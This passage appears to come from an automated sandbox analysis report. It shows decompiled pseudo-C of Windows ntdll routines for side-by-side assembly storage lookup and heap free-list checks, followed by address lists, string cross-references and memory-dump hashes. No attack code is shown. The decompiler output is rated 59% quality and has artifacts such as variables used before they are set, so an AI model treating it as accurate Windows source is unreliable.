                                                                                                                                                    						_v1112 = 0;
                                                                                                                                                    						_v1111 = 0;
                                                                                                                                                    						_v1132(2,  &_v1120, _v1140);
                                                                                                                                                    						if(_v1112 != 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1111 != 0) {
                                                                                                                                                    							if(_v1108 == 0) {
                                                                                                                                                    								goto L59;
                                                                                                                                                    							}
                                                                                                                                                    							_t159 = _t286 + 1; // 0x1
                                                                                                                                                    							_v1080 = _t159;
                                                                                                                                                    						}
                                                                                                                                                    						if(_v1108 != 0) {
                                                                                                                                                    							if(_v1068 != 0) {
                                                                                                                                                    								E00C5F9F0(_v1068);
                                                                                                                                                    								_v1068 = 0;
                                                                                                                                                    							}
                                                                                                                                                    							_t288 = E00C8D088(0,  &_v1108,  &_v1152,  &_v1160,  &_v1088,  &_v1076,  &_v1068);
                                                                                                                                                    							if(_t288 >= 0) {
                                                                                                                                                    								goto L14;
                                                                                                                                                    							} else {
                                                                                                                                                    								if(_t288 == 0xc0150004) {
                                                                                                                                                    									goto L13;
                                                                                                                                                    								} else {
                                                                                                                                                    									_push(_t288);
                                                                                                                                                    									_push( &_v1152);
                                                                                                                                                    									L00CB3F92(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1108);
                                                                                                                                                    									goto L19;
                                                                                                                                                    								}
                                                                                                                                                    								goto L27;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						L13:
                                                                                                                                                    						_t286 = _t286 + 1;
                                                                                                                                                    						if(_t286 < _v1080) {
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						goto L14;
                                                                                                                                                    					}
                                                                                                                                                    					_t288 = 0xc0000120;
                                                                                                                                                    					goto L19;
                                                                                                                                                    				}
                                                                                                                                                    			}
































































                                                                                                                                                    0x00c8c69a
                                                                                                                                                    0x00ca22f8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c6b2
                                                                                                                                                    0x00c8c6b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c6c6
                                                                                                                                                    0x00c8c6d4
                                                                                                                                                    0x00c8c6d6
                                                                                                                                                    0x00c8c6d9
                                                                                                                                                    0x00c8c6e1
                                                                                                                                                    0x00cc5384
                                                                                                                                                    0x00cc538e
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5396
                                                                                                                                                    0x00c8c6eb
                                                                                                                                                    0x00ca2196
                                                                                                                                                    0x00ca219c
                                                                                                                                                    0x00ca21a5
                                                                                                                                                    0x00ca21a7
                                                                                                                                                    0x00ca21ad
                                                                                                                                                    0x00cc53a0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53a0
                                                                                                                                                    0x00ca21b6
                                                                                                                                                    0x00ca21bc
                                                                                                                                                    0x00ca21bf
                                                                                                                                                    0x00cc53aa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53aa
                                                                                                                                                    0x00ca21cd
                                                                                                                                                    0x00ca21d8
                                                                                                                                                    0x00cc53bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53c2
                                                                                                                                                    0x00cc53c9
                                                                                                                                                    0x00cc53cf
                                                                                                                                                    0x00cc53d7
                                                                                                                                                    0x00cc53e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53e9
                                                                                                                                                    0x00cc53d9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc53d9
                                                                                                                                                    0x00ca21de
                                                                                                                                                    0x00ca21de
                                                                                                                                                    0x00ca21f4
                                                                                                                                                    0x00ca2204
                                                                                                                                                    0x00ca2206
                                                                                                                                                    0x00ca2211
                                                                                                                                                    0x00ca2217
                                                                                                                                                    0x00c8c841
                                                                                                                                                    0x00c8c847
                                                                                                                                                    0x00ca223e
                                                                                                                                                    0x00cc5405
                                                                                                                                                    0x00cc540d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc540d
                                                                                                                                                    0x00ca224a
                                                                                                                                                    0x00ca2250
                                                                                                                                                    0x00ca2259
                                                                                                                                                    0x00cc552f
                                                                                                                                                    0x00cc553b
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca225f
                                                                                                                                                    0x00ca226b
                                                                                                                                                    0x00ca2271
                                                                                                                                                    0x00ca2279
                                                                                                                                                    0x00ca227f
                                                                                                                                                    0x00ca2287
                                                                                                                                                    0x00ca228e
                                                                                                                                                    0x00ca228f
                                                                                                                                                    0x00ca229b
                                                                                                                                                    0x00ca22a5
                                                                                                                                                    0x00ca22af
                                                                                                                                                    0x00ca22b5
                                                                                                                                                    0x00ca22c0
                                                                                                                                                    0x00ca22c9
                                                                                                                                                    0x00ca22d0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00ca22d6
                                                                                                                                                    0x00cc554c
                                                                                                                                                    0x00cc5558
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc555d
                                                                                                                                                    0x00ca22d0
                                                                                                                                                    0x00c8c84d
                                                                                                                                                    0x00c8c863
                                                                                                                                                    0x00c8c868
                                                                                                                                                    0x00c8c86c
                                                                                                                                                    0x00cc556e
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00c8c872
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c86c
                                                                                                                                                    0x00c8c6f7
                                                                                                                                                    0x00c8c6fd
                                                                                                                                                    0x00c8c701
                                                                                                                                                    0x00c8c708
                                                                                                                                                    0x00c8c714
                                                                                                                                                    0x00c8c71c
                                                                                                                                                    0x00c8c728
                                                                                                                                                    0x00c8c735
                                                                                                                                                    0x00c8c744
                                                                                                                                                    0x00c8c74a
                                                                                                                                                    0x00c8c750
                                                                                                                                                    0x00c8c756
                                                                                                                                                    0x00c8c75c
                                                                                                                                                    0x00c8c762
                                                                                                                                                    0x00c8c768
                                                                                                                                                    0x00c8c774
                                                                                                                                                    0x00cc5417
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc5417
                                                                                                                                                    0x00c8c780
                                                                                                                                                    0x00cc5451
                                                                                                                                                    0x00cc5455
                                                                                                                                                    0x00cc548e
                                                                                                                                                    0x00cc5492
                                                                                                                                                    0x00cc549d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc549d
                                                                                                                                                    0x00cc5494
                                                                                                                                                    0x00cc5495
                                                                                                                                                    0x00cc5496
                                                                                                                                                    0x00cc5464
                                                                                                                                                    0x00cc5464
                                                                                                                                                    0x00cc5465
                                                                                                                                                    0x00cc5467
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc546c
                                                                                                                                                    0x00cc5457
                                                                                                                                                    0x00cc545e
                                                                                                                                                    0x00cc545f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc545f
                                                                                                                                                    0x00c8c78c
                                                                                                                                                    0x00c8c792
                                                                                                                                                    0x00c8c798
                                                                                                                                                    0x00c8c79a
                                                                                                                                                    0x00c8c7a0
                                                                                                                                                    0x00c8c7a9
                                                                                                                                                    0x00c8c835
                                                                                                                                                    0x00c8c83b
                                                                                                                                                    0x00cc54df
                                                                                                                                                    0x00cc54df
                                                                                                                                                    0x00cc54ef
                                                                                                                                                    0x00cc54f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc54f7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c7af
                                                                                                                                                    0x00c8c7af
                                                                                                                                                    0x00c8c7bb
                                                                                                                                                    0x00c8c7c3
                                                                                                                                                    0x00c8c7cf
                                                                                                                                                    0x00c8c7dc
                                                                                                                                                    0x00c8c7eb
                                                                                                                                                    0x00c8c7f1
                                                                                                                                                    0x00c8c7f7
                                                                                                                                                    0x00c8c7fd
                                                                                                                                                    0x00c8c809
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c815
                                                                                                                                                    0x00cc54ab
                                                                                                                                                    0x00000000

                                                                                                                                                    Strings
                                                                                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 00CC5581
                                                                                                                                                    • @, xrefs: 00CA22A5
                                                                                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00CC5586
                                                                                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 00CC5566
                                                                                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00CC5550
                                                                                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00CC551A
                                                                                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00CC54E7
                                                                                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00CC545F
                                                                                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00CC5386
                                                                                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00CC53FD
                                                                                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00CC5496
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243537115.0000000000D40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243545134.0000000000D44000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243552482.0000000000D47000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243558887.0000000000D50000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243653736.0000000000DB0000.00000040.00000001.sdmp
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                                    • API String ID: 0-4009184096
                                                                                                                                                    • Opcode ID: d38e7926752004fbf255b2e8715c158662851609f97f8a508c787486d9732b96
                                                                                                                                                    • Instruction ID: 63416a56df0d4651556d13d1470eb9a6e35d07bf6eb9ec98f6b9fea23c337ecf
                                                                                                                                                    • Opcode Fuzzy Hash: d38e7926752004fbf255b2e8715c158662851609f97f8a508c787486d9732b96
                                                                                                                                                    • Instruction Fuzzy Hash: 36023EF1D406689FDB20DF54CC80BAAB7B8AF55304F4441EAE609A7251E6309FC4DF69
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                                    			E00D1098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				signed int _v12;
                                                                                                                                                    				signed int* _v16;
                                                                                                                                                    				signed int _v20;
                                                                                                                                                    				signed int _v24;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* __ebp;
                                                                                                                                                    				signed int* _t165;
                                                                                                                                                    				intOrPtr _t168;
                                                                                                                                                    				signed short _t181;
                                                                                                                                                    				intOrPtr _t183;
                                                                                                                                                    				signed int* _t204;
                                                                                                                                                    				signed int _t209;
                                                                                                                                                    				signed int _t214;
                                                                                                                                                    				signed int* _t216;
                                                                                                                                                    				signed int _t226;
                                                                                                                                                    				signed int _t228;
                                                                                                                                                    				signed int _t233;
                                                                                                                                                    				intOrPtr _t235;
                                                                                                                                                    				intOrPtr _t246;
                                                                                                                                                    				intOrPtr _t257;
                                                                                                                                                    				signed int _t280;
                                                                                                                                                    				signed int* _t281;
                                                                                                                                                    				signed int* _t282;
                                                                                                                                                    				signed short _t284;
                                                                                                                                                    				signed short _t286;
                                                                                                                                                    				signed char _t288;
                                                                                                                                                    				intOrPtr* _t298;
                                                                                                                                                    				signed int _t309;
                                                                                                                                                    				signed int _t310;
                                                                                                                                                    				signed int* _t311;
                                                                                                                                                    				unsigned int _t312;
                                                                                                                                                    				signed int* _t313;
                                                                                                                                                    				signed int _t314;
                                                                                                                                                    				signed int _t315;
                                                                                                                                                    				intOrPtr _t316;
                                                                                                                                                    				signed int _t317;
                                                                                                                                                    				signed int _t318;
                                                                                                                                                    				signed int _t319;
                                                                                                                                                    
                                                                                                                                                    				_t308 = __edx;
                                                                                                                                                    				_t311 = _a4;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v8 = 0;
                                                                                                                                                    				_v16 = _t311;
                                                                                                                                                    				if(L00D0FB7A(__ecx, __edx, _t311, 0) == 0) {
                                                                                                                                                    					L84:
                                                                                                                                                    					E00D106F9(_v16);
                                                                                                                                                    					_t337 = _v8;
                                                                                                                                                    					if(_v8 != 0) {
                                                                                                                                                    						_a4 = _a4 & 0x00000000;
                                                                                                                                                    						E00C74167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                                                                                                                    					}
                                                                                                                                                    					L48:
                                                                                                                                                    					return 0;
                                                                                                                                                    				}
                                                                                                                                                    				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
                                                                                                                                                    					_t308 = 0;
                                                                                                                                                    					_t165 =  &(_t311[0x31]);
                                                                                                                                                    					_t280 =  *_t165;
                                                                                                                                                    					_a8 = 0;
                                                                                                                                                    					_v24 = 0;
                                                                                                                                                    					while(_t165 != _t280) {
                                                                                                                                                    						_t280 =  *_t280;
                                                                                                                                                    						_a4 =  *_t313 & 0x0000ffff;
                                                                                                                                                    						_t288 = _t313[0];
                                                                                                                                                    						_v16 = _t313;
                                                                                                                                                    						__eflags = _t288 & 0x00000001;
                                                                                                                                                    						if((_t288 & 0x00000001) != 0) {
                                                                                                                                                    							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t168 + 0xc);
                                                                                                                                                    							if( *(_t168 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E00CB373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push(_t313);
                                                                                                                                                    							E00CB373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
                                                                                                                                                    							L22:
                                                                                                                                                    							__eflags = _t311[0x13];
                                                                                                                                                    							if(_t311[0x13] != 0) {
                                                                                                                                                    								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
                                                                                                                                                    								 *_t313 =  *_t313 ^ _t311[0x14];
                                                                                                                                                    							}
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t181 =  *_t313 & 0x0000ffff;
                                                                                                                                                    						__eflags = _t181 - _v24;
                                                                                                                                                    						if(_t181 < _v24) {
                                                                                                                                                    							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t183 + 0xc);
                                                                                                                                                    							if( *(_t183 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E00CB373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							E00CB373B("Non-Dedicated free list element %p is out of order\n", _t313);
                                                                                                                                                    							goto L22;
                                                                                                                                                    						}
                                                                                                                                                    						_t308 = 0;
                                                                                                                                                    						_v24 = _t181 & 0x0000ffff;
                                                                                                                                                    						__eflags = _t311[0x13];
                                                                                                                                                    						if(_t311[0x13] != 0) {
                                                                                                                                                    							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
                                                                                                                                                    							 *_t313 =  *_t313 ^ _t311[0x14];
                                                                                                                                                    							__eflags =  *_t313;
                                                                                                                                                    						}
                                                                                                                                                    						_t29 =  &_a8;
                                                                                                                                                    						 *_t29 = _a8 + 1;
                                                                                                                                                    						__eflags =  *_t29;
                                                                                                                                                    						_t165 =  &(_t311[0x31]);
                                                                                                                                                    					}
                                                                                                                                                    					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
                                                                                                                                                    					if( *0xd492a4 != 0 && _t311[0x30] != _t308) {
                                                                                                                                                    						_push(4);
                                                                                                                                                    						_push(0x1000);
                                                                                                                                                    						_push( &_a4);
                                                                                                                                                    						_push(0);
                                                                                                                                                    						_push( &_v8);
                                                                                                                                                    						if(E00C5FAD0(0xffffffff) >= 0) {
                                                                                                                                                    							_v12 = _v8 + 0x204;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t204 =  &(_t311[0x28]);
                                                                                                                                                    					_t314 =  *_t204;
                                                                                                                                                    					while(_t204 != _t314) {
                                                                                                                                                    						__eflags = _t311[0x13];
                                                                                                                                                    						_t281 = _t314 + 0x18;
                                                                                                                                                    						if(_t311[0x13] != 0) {
                                                                                                                                                    							 *_t281 =  *_t281 ^ _t311[0x14];
                                                                                                                                                    							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
                                                                                                                                                    							if(__eflags != 0) {
                                                                                                                                                    								_push(0);
                                                                                                                                                    								_push(_t281);
                                                                                                                                                    								_push(_t311);
                                                                                                                                                    								E00D0F8EE(_t281, _t311, _t314, __eflags);
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						_t295 = _v12;
                                                                                                                                                    						__eflags = _t295;
                                                                                                                                                    						if(_t295 == 0) {
                                                                                                                                                    							L39:
                                                                                                                                                    							__eflags =  *(_t314 + 0x1a) & 0x00000004;
                                                                                                                                                    							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
                                                                                                                                                    								L41:
                                                                                                                                                    								__eflags = _t311[0x13];
                                                                                                                                                    								if(_t311[0x13] != 0) {
                                                                                                                                                    									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
                                                                                                                                                    									 *_t281 =  *_t281 ^ _t311[0x14];
                                                                                                                                                    									__eflags =  *_t281;
                                                                                                                                                    								}
                                                                                                                                                    								_t314 =  *_t314;
                                                                                                                                                    								_t204 =  &(_t311[0x28]);
                                                                                                                                                    								continue;
                                                                                                                                                    							}
                                                                                                                                                    							_t209 = E00CF579A(_t295, _t311, _t281);
                                                                                                                                                    							__eflags = _t209;
                                                                                                                                                    							if(_t209 == 0) {
                                                                                                                                                    								__eflags = _t311[0x13];
                                                                                                                                                    								if(_t311[0x13] != 0) {
                                                                                                                                                    									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
                                                                                                                                                    									_t95 = _t314 + 0x18;
                                                                                                                                                    									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
                                                                                                                                                    									__eflags =  *_t95;
                                                                                                                                                    								}
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							goto L41;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
                                                                                                                                                    							__eflags = _t214;
                                                                                                                                                    							if(_t214 == 0) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t214 & 0x00008000;
                                                                                                                                                    							if((_t214 & 0x00008000) == 0) {
                                                                                                                                                    								__eflags = _t214 & 0x00000800;
                                                                                                                                                    								if((_t214 & 0x00000800) != 0) {
                                                                                                                                                    									goto L39;
                                                                                                                                                    								}
                                                                                                                                                    								__eflags = _t214 - _t311[0x22];
                                                                                                                                                    								if(_t214 >= _t311[0x22]) {
                                                                                                                                                    									goto L39;
                                                                                                                                                    								}
                                                                                                                                                    								L38:
                                                                                                                                                    								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
                                                                                                                                                    								_t295 =  *(_t314 + 0x10) >> 3;
                                                                                                                                                    								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
                                                                                                                                                    								__eflags =  *_t216;
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_t214 = _t214 & 0x00007fff;
                                                                                                                                                    							_t295 = 0x81;
                                                                                                                                                    							__eflags = _t214 - 0x81;
                                                                                                                                                    							if(_t214 >= 0x81) {
                                                                                                                                                    								goto L39;
                                                                                                                                                    							}
                                                                                                                                                    							_t295 = _v8;
                                                                                                                                                    							goto L38;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_v20 = _v20 & 0x00000000;
                                                                                                                                                    					_v24 = _v24 & 0x00000000;
                                                                                                                                                    					_t282 =  &(_t311[0x2a]);
                                                                                                                                                    					_t315 =  *_t282;
                                                                                                                                                    					while(_t315 != _t282) {
                                                                                                                                                    						_t226 = L00D0FDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
                                                                                                                                                    						__eflags = _t226;
                                                                                                                                                    						if(_t226 == 0) {
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t315 =  *_t315;
                                                                                                                                                    					}
                                                                                                                                                    					_t316 = _a8;
                                                                                                                                                    					_v16 = _t311;
                                                                                                                                                    					if(_t316 == _v20) {
                                                                                                                                                    						__eflags = _t311[0x1e] - _v24;
                                                                                                                                                    						if(_t311[0x1e] == _v24) {
                                                                                                                                                    							_t228 = _v8;
                                                                                                                                                    							__eflags = _t228;
                                                                                                                                                    							if(_t228 == 0) {
                                                                                                                                                    								goto L74;
                                                                                                                                                    							}
                                                                                                                                                    							_t317 = _t311[0x30];
                                                                                                                                                    							__eflags = _t317;
                                                                                                                                                    							if(_t317 == 0) {
                                                                                                                                                    								L68:
                                                                                                                                                    								_t318 = _t311[0x23];
                                                                                                                                                    								__eflags = _t318;
                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                    									L73:
                                                                                                                                                    									_a4 = 0;
                                                                                                                                                    									E00C74167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
                                                                                                                                                    									goto L74;
                                                                                                                                                    								}
                                                                                                                                                    								_t233 = _t311[0x22] & 0x0000ffff;
                                                                                                                                                    								_t284 = 1;
                                                                                                                                                    								_t308 = 1;
                                                                                                                                                    								__eflags = 1 - _t233;
                                                                                                                                                    								if(__eflags >= 0) {
                                                                                                                                                    									goto L73;
                                                                                                                                                    								}
                                                                                                                                                    								_t312 = _v12;
                                                                                                                                                    								while(1) {
                                                                                                                                                    									_t309 = _t284 & 0x0000ffff;
                                                                                                                                                    									_t308 =  *(_t312 + _t309 * 4);
                                                                                                                                                    									_t318 = _t318 + 0x40;
                                                                                                                                                    									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
                                                                                                                                                    									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
                                                                                                                                                    										break;
                                                                                                                                                    									}
                                                                                                                                                    									_t284 = _t284 + 1;
                                                                                                                                                    									__eflags = _t284 - _t233;
                                                                                                                                                    									if(__eflags < 0) {
                                                                                                                                                    										continue;
                                                                                                                                                    									}
                                                                                                                                                    									goto L73;
                                                                                                                                                    								}
                                                                                                                                                    								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    								__eflags =  *(_t235 + 0xc);
                                                                                                                                                    								if( *(_t235 + 0xc) == 0) {
                                                                                                                                                    									_push("HEAP: ");
                                                                                                                                                    									E00CB373B();
                                                                                                                                                    								} else {
                                                                                                                                                    									E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    								}
                                                                                                                                                    								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
                                                                                                                                                    								_push(_t298);
                                                                                                                                                    								_push( *_t298);
                                                                                                                                                    								_t319 = _t318 + 0x10;
                                                                                                                                                    								__eflags = _t319;
                                                                                                                                                    								_push( *((intOrPtr*)(_t319 - 8)));
                                                                                                                                                    								_push(_t319);
                                                                                                                                                    								E00CB373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
                                                                                                                                                    								goto L84;
                                                                                                                                                    							}
                                                                                                                                                    							_t286 = 1;
                                                                                                                                                    							__eflags = 1;
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t310 = _t286 & 0x0000ffff;
                                                                                                                                                    								_t308 =  *(_t228 + _t310 * 4);
                                                                                                                                                    								_t317 = _t317 + 0xc;
                                                                                                                                                    								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
                                                                                                                                                    								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t286 = _t286 + 1;
                                                                                                                                                    								_t308 = 0x81;
                                                                                                                                                    								__eflags = _t286 - 0x81;
                                                                                                                                                    								if(_t286 < 0x81) {
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								goto L68;
                                                                                                                                                    							}
                                                                                                                                                    							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    							__eflags =  *(_t246 + 0xc);
                                                                                                                                                    							if( *(_t246 + 0xc) == 0) {
                                                                                                                                                    								_push("HEAP: ");
                                                                                                                                                    								E00CB373B();
                                                                                                                                                    							} else {
                                                                                                                                                    								E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    							}
                                                                                                                                                    							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
                                                                                                                                                    							_push( *((intOrPtr*)(_t317 + 8)));
                                                                                                                                                    							E00CB373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
                                                                                                                                                    							goto L84;
                                                                                                                                                    						}
                                                                                                                                                    						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                    						__eflags =  *(_t257 + 0xc);
                                                                                                                                                    						if( *(_t257 + 0xc) == 0) {
                                                                                                                                                    							_push("HEAP: ");
                                                                                                                                                    							E00CB373B();
                                                                                                                                                    						} else {
                                                                                                                                                    							E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    						}
                                                                                                                                                    						_push(_t311[0x1e]);
                                                                                                                                                    						_push(_v24);
                                                                                                                                                    						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
                                                                                                                                                    						L57:
                                                                                                                                                    						E00CB373B();
                                                                                                                                                    						goto L84;
                                                                                                                                                    					}
                                                                                                                                                    					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
                                                                                                                                                    						_push("HEAP: ");
                                                                                                                                                    						E00CB373B();
                                                                                                                                                    					} else {
                                                                                                                                                    						E00CB373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
                                                                                                                                                    					}
                                                                                                                                                    					_push(_t316);
                                                                                                                                                    					_push(_v20);
                                                                                                                                                    					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                                                                                                                                    					goto L57;
                                                                                                                                                    				} else {
                                                                                                                                                    					L74:
                                                                                                                                                    					return 1;
                                                                                                                                                    				}
                                                                                                                                                    			}












































                                                                                                                                                    0x00d10c47
                                                                                                                                                    0x00d10c49
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00d10c4f
                                                                                                                                                    0x00d10c4f
                                                                                                                                                    0x00d10c55
                                                                                                                                                    0x00d10c58
                                                                                                                                                    0x00d10c5e
                                                                                                                                                    0x00d10cb3
                                                                                                                                                    0x00d10cb6
                                                                                                                                                    0x00d10cff
                                                                                                                                                    0x00d10d04
